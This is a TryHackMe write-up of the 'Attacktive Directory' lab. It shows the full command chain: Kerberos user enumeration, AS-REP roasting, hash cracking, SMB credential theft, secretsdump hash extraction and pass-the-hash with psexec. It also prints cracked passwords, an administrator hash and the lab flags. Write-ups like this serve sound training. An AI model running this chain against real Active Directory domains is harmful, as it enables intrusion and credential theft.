// htb writeup TryHackMe 2026-02-25
AttacktiveDirectory
HackTheBox Easy TryHackMe
Active Directory / Windows
root obtained // PWNED

🧪 TryHackMe: Attacktive Directory

Platform: TryHackMe
IP Address: 10.201.3.44
Difficulty: Easy
Category: Active Directory / Windows


🧭 Overview

A beginner-friendly Windows Active Directory machine focused on Kerberos pre-auth attacks, password cracking, SMB enumeration, and eventual domain compromise using extracted credentials. Classic enumeration-to-own workflow, with useful tooling reminders along the way.


🔍 Enumeration

🔎 RustScan

rustscan --ulimit 5000 -a $target -- -sC -sV -Pn -oN nmap_full

Ports Identified:

🔎 Kerberos User Enumeration

kerbrute userenum userlist.txt --dc $target -d spookysec.local

Valid Users Found:


💥 Exploitation

🔐 AS-REP Roasting

GetNPUsers.py spookysec.local/ -no-pass -usersfile userlist.txt -dc-ip $target

Found hash for: svc-admin@SPOOKYSEC.LOCAL

🔓 Cracking with John

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Password: management2005

🔁 WinRM (Failed), SMB (Success)

netexec winrm $target -u 'svc-admin' -p 'management2005'
netexec smb $target -u 'svc-admin' -p 'management2005' --shares

📁 Downloading Credentials via SMB

smbclient -U 'svc-admin' \\$target\backup
# File: backup_credentials.txt
echo 'YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw' | base64 -d
# => backup@spookysec.local:backup2517860

🖥️ RDP with Backup User

xfreerdp3 /v:$target /u:"backup" /p:"backup2517860"
# User flag: TryHackMe{K3rb3r0s_Pr3_4uth}

🚪 Privilege Escalation

🧂 Secrets Dump

secretsdump.py spookysec.local/backup:'backup2517860'@$target
# Extracted Administrator hash: aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc

🛠️ Psexec

psexec.py spookysec.local/administrator@$target -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc

Root Flag:

TryHackMe{4ctiveD1rectoryM4st3r}

🧠 Lessons Learned


🛠️ Toolbox

Tool Purpose
rustscan Fast port discovery
kerbrute Kerberos username enumeration
GetNPUsers.py AS-REP Roasting
john Offline password cracking
netexec Service access testing (smb, winrm)
smbclient Manual file download
xfreerdp3 RDP client
secretsdump.py Hash dump via DRSUAPI
psexec.py Remote command execution using hashes

Proof